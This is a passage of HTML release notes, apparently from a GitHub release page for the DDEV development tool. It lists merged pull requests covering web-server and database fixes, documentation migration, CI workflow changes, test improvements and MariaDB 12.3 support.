<li>fix(ddev-webserver): <code>ddev stop</code> takes 10s due to bash deferring SIGTERM during foreground cat, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4218384497" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8295" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8295/hovercard" href="https://github.com/ddev/ddev/issues/8295">#8295</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4408650681" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8396" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8396/hovercard" href="https://github.com/ddev/ddev/pull/8396">#8396</a></li>
<li>docs: unify homeadditions path resolution and Composer auth.json handling by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eiriksm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eiriksm">@eiriksm</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4420266904" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8400" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8400/hovercard" href="https://github.com/ddev/ddev/pull/8400">#8400</a></li>
<li>docs(providers): align --environment examples and flags, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4428749367" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8402" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8402/hovercard" href="https://github.com/ddev/ddev/issues/8402">#8402</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4428795862" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8403" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8403/hovercard" href="https://github.com/ddev/ddev/pull/8403">#8403</a></li>
<li>test(share): improve cloudflared debug output on unmarshal errors by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4415837658" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8398" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8398/hovercard" href="https://github.com/ddev/ddev/pull/8398">#8398</a></li>
<li>ci(github): reorganize test jobs, add custom workflow_dispatch, remove unused workflows by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4423464019" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8401" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8401/hovercard" href="https://github.com/ddev/ddev/pull/8401">#8401</a></li>
<li>feat(add-on): add <code>#ddev-interactive</code> option for actions, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3958400616" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8155" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8155/hovercard" href="https://github.com/ddev/ddev/issues/8155">#8155</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367267290" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8381" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8381/hovercard" href="https://github.com/ddev/ddev/pull/8381">#8381</a></li>
<li>refactor(tui): upgrade bubbletea/bubbles/lipgloss to v2 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4430728699" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8404" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8404/hovercard" href="https://github.com/ddev/ddev/pull/8404">#8404</a></li>
<li>ci: add DDEV_EMBARGO_PHP_VERSIONS to skip specific PHP versions in TestPHPConfig [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4432602123" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8407" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8407/hovercard" href="https://github.com/ddev/ddev/pull/8407">#8407</a></li>
<li>feat: use docker-compose library, optionally download docker-buildx, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3686218597" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7915" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7915/hovercard" href="https://github.com/ddev/ddev/issues/7915">#7915</a>, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4218384497" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8295" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8295/hovercard" href="https://github.com/ddev/ddev/issues/8295">#8295</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4091341649" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8234" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8234/hovercard" href="https://github.com/ddev/ddev/pull/8234">#8234</a></li>
<li>ci(docs): add stable docs branch workflow, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3626446323" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7862" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7862/hovercard" href="https://github.com/ddev/ddev/issues/7862">#7862</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4436512981" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8408" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8408/hovercard" href="https://github.com/ddev/ddev/pull/8408">#8408</a></li>
<li>ci(forks): fetch variables from public-variables branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4439217094" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8410" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8410/hovercard" href="https://github.com/ddev/ddev/pull/8410">#8410</a></li>
<li>ci(wsl2): read public-variables in pwsh, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4439217094" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8410" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8410/hovercard" href="https://github.com/ddev/ddev/pull/8410">#8410</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4439903018" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8411" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8411/hovercard" href="https://github.com/ddev/ddev/pull/8411">#8411</a></li>
<li>ci: improve test embargo system for Go, bats, and CI workflows by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4445844483" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8413" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8413/hovercard" href="https://github.com/ddev/ddev/pull/8413">#8413</a></li>
<li>docs(config): improve wording for database and docker_buildx_version, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4382057472" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8387" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8387/hovercard" href="https://github.com/ddev/ddev/pull/8387">#8387</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4437190033" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8409" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8409/hovercard" href="https://github.com/ddev/ddev/pull/8409">#8409</a></li>
<li>refactor: improve CheckAvailableSpace reliability and output, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4387455452" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8388" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8388/hovercard" href="https://github.com/ddev/ddev/issues/8388">#8388</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wolcen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wolcen">@wolcen</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4441784873" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8412" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8412/hovercard" href="https://github.com/ddev/ddev/pull/8412">#8412</a></li>
<li>ci(buildkite): fix MSYS path conversion breaking public-variables fetch on Windows, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4439217094" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8410" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8410/hovercard" href="https://github.com/ddev/ddev/pull/8410">#8410</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4469883387" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8416" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8416/hovercard" href="https://github.com/ddev/ddev/pull/8416">#8416</a></li>
<li>docs(brand-guide): add light, dark, and auto logo variants to logos table, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4472217677" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8417" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8417/hovercard" href="https://github.com/ddev/ddev/issues/8417">#8417</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4487849922" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8419" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8419/hovercard" href="https://github.com/ddev/ddev/pull/8419">#8419</a></li>
<li>feat(docs): migrate from mkdocs-material to zensical, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3613763641" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7840" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7840/hovercard" href="https://github.com/ddev/ddev/issues/7840">#7840</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4053894144" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8216" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8216/hovercard" href="https://github.com/ddev/ddev/issues/8216">#8216</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4497071680" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8421" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8421/hovercard" href="https://github.com/ddev/ddev/pull/8421">#8421</a></li>
<li>docs(add-ons): mention <code>#ddev-generated</code> in quickstart by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chx">@chx</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4494536198" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8420" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8420/hovercard" href="https://github.com/ddev/ddev/pull/8420">#8420</a></li>
<li>ci(docs): enable zensical strict mode, use dynamic Pages base URL, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4497071680" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8421" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8421/hovercard" href="https://github.com/ddev/ddev/pull/8421">#8421</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4501866656" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8423" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8423/hovercard" href="https://github.com/ddev/ddev/pull/8423">#8423</a></li>
<li>fix(ddev-dbserver): unlink stale socket before mysqld init by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4502303473" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8424" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8424/hovercard" href="https://github.com/ddev/ddev/pull/8424">#8424</a></li>
<li>test: add details to TestCmdAddonPHP by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4504444004" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8425" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8425/hovercard" href="https://github.com/ddev/ddev/pull/8425">#8425</a></li>
<li>chore(sponsors): update percentage and api link [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4523958874" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8427" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8427/hovercard" href="https://github.com/ddev/ddev/pull/8427">#8427</a></li>
<li>ci(pr): migrate to ddev/commit-message-checker@v3 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4525819574" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8428" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8428/hovercard" href="https://github.com/ddev/ddev/pull/8428">#8428</a></li>
<li>test(lima): fix broken cleanup in TestCmdAddonPHP, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4504444004" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8425" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8425/hovercard" href="https://github.com/ddev/ddev/pull/8425">#8425</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534532321" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8430" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8430/hovercard" href="https://github.com/ddev/ddev/pull/8430">#8430</a></li>
<li>fix: replace remaining world writeable directories, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4135827270" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8251" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8251/hovercard" href="https://github.com/ddev/ddev/issues/8251">#8251</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AkibaAT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AkibaAT">@AkibaAT</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367047484" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8379" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8379/hovercard" href="https://github.com/ddev/ddev/pull/8379">#8379</a></li>
<li>chore(composer): add <code>COMPOSER_NO_BLOCKING</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4540301022" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8432" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8432/hovercard" href="https://github.com/ddev/ddev/pull/8432">#8432</a></li>
<li>fix(exec): allocate TTY only when stdout is also a terminal, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4091341649" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8234" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8234/hovercard" href="https://github.com/ddev/ddev/pull/8234">#8234</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4540181746" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8431" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8431/hovercard" href="https://github.com/ddev/ddev/pull/8431">#8431</a></li>
<li>feat(docker-rootless): remove no-bind-mounts requirement, test gvisor-tap-vsock by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4512197309" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8426" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8426/hovercard" href="https://github.com/ddev/ddev/pull/8426">#8426</a></li>
<li>build: pin Node.js to 24.15.0, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4555564450" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8436" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8436/hovercard" href="https://github.com/ddev/ddev/issues/8436">#8436</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4557653464" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8438" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8438/hovercard" href="https://github.com/ddev/ddev/pull/8438">#8438</a></li>
<li>test(linux): wait for nc to bind before asserting in port-diagnose tests by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4577688152" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8446" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8446/hovercard" href="https://github.com/ddev/ddev/pull/8446">#8446</a></li>
<li>test: rework local HTTP test helpers with clearer failure output by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4581438165" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8447" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8447/hovercard" href="https://github.com/ddev/ddev/pull/8447">#8447</a></li>
<li>fix(nodejs): move install to Dockerfile, add ~/n/bin to PATH, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4447652737" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8414" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8414/hovercard" href="https://github.com/ddev/ddev/issues/8414">#8414</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4447694768" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8415" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8415/hovercard" href="https://github.com/ddev/ddev/issues/8415">#8415</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4565282332" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8443" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8443/hovercard" href="https://github.com/ddev/ddev/pull/8443">#8443</a></li>
<li>fix(zensical): retry strict build on false-positive "page does not exist" warnings by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4597532685" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8451" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8451/hovercard" href="https://github.com/ddev/ddev/pull/8451">#8451</a></li>
<li>ci(linux): use full homebrew formulae name, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4589599706" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8450" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8450/hovercard" href="https://github.com/ddev/ddev/issues/8450">#8450</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4612159727" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8455" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8455/hovercard" href="https://github.com/ddev/ddev/pull/8455">#8455</a></li>
<li>test(quickstart): update asterios page check by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4612039963" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8454" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8454/hovercard" href="https://github.com/ddev/ddev/pull/8454">#8454</a></li>
<li>feat: add MariaDB 12.3 LTS support, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4604820646" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8452" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/8452/hovercard" href="https://github.com/ddev/ddev/issues/8452">#8452</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4607401729" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8453" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8453/hovercard" href="https://github.com/ddev/ddev/pull/8453">#8453</a></li>
<li>fix(dbserver): use wrapper scripts for MariaDB 11.x+ MySQL compat, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2760145770" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6861" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6861/hovercard" href="https://github.com/ddev/ddev/issues/6861">#6861</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4614529441" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8456" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8456/hovercard" href="https://github.com/ddev/ddev/pull/8456">#8456</a></li>
<li>test(buildkite): Fix brew upgrade to use -y for new 6.0.0 release, fix setup-homebrew by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4642259004" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8469" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8469/hovercard" href="https://github.com/ddev/ddev/pull/8469">#8469</a></li>
<li>build(gnupg): Remove references to obsolete gnupg2 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4656275880" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8475" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8475/hovercard" href="https://github.com/ddev/ddev/pull/8475">#8475</a></li>
<li>fix: recreate service on <code>ddev utility rebuild -s</code>, support profile services by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4630837333" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/8463" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/8463/hovercard" href="https://github.com/ddev/ddev/pull/8463">#8463</a></li>
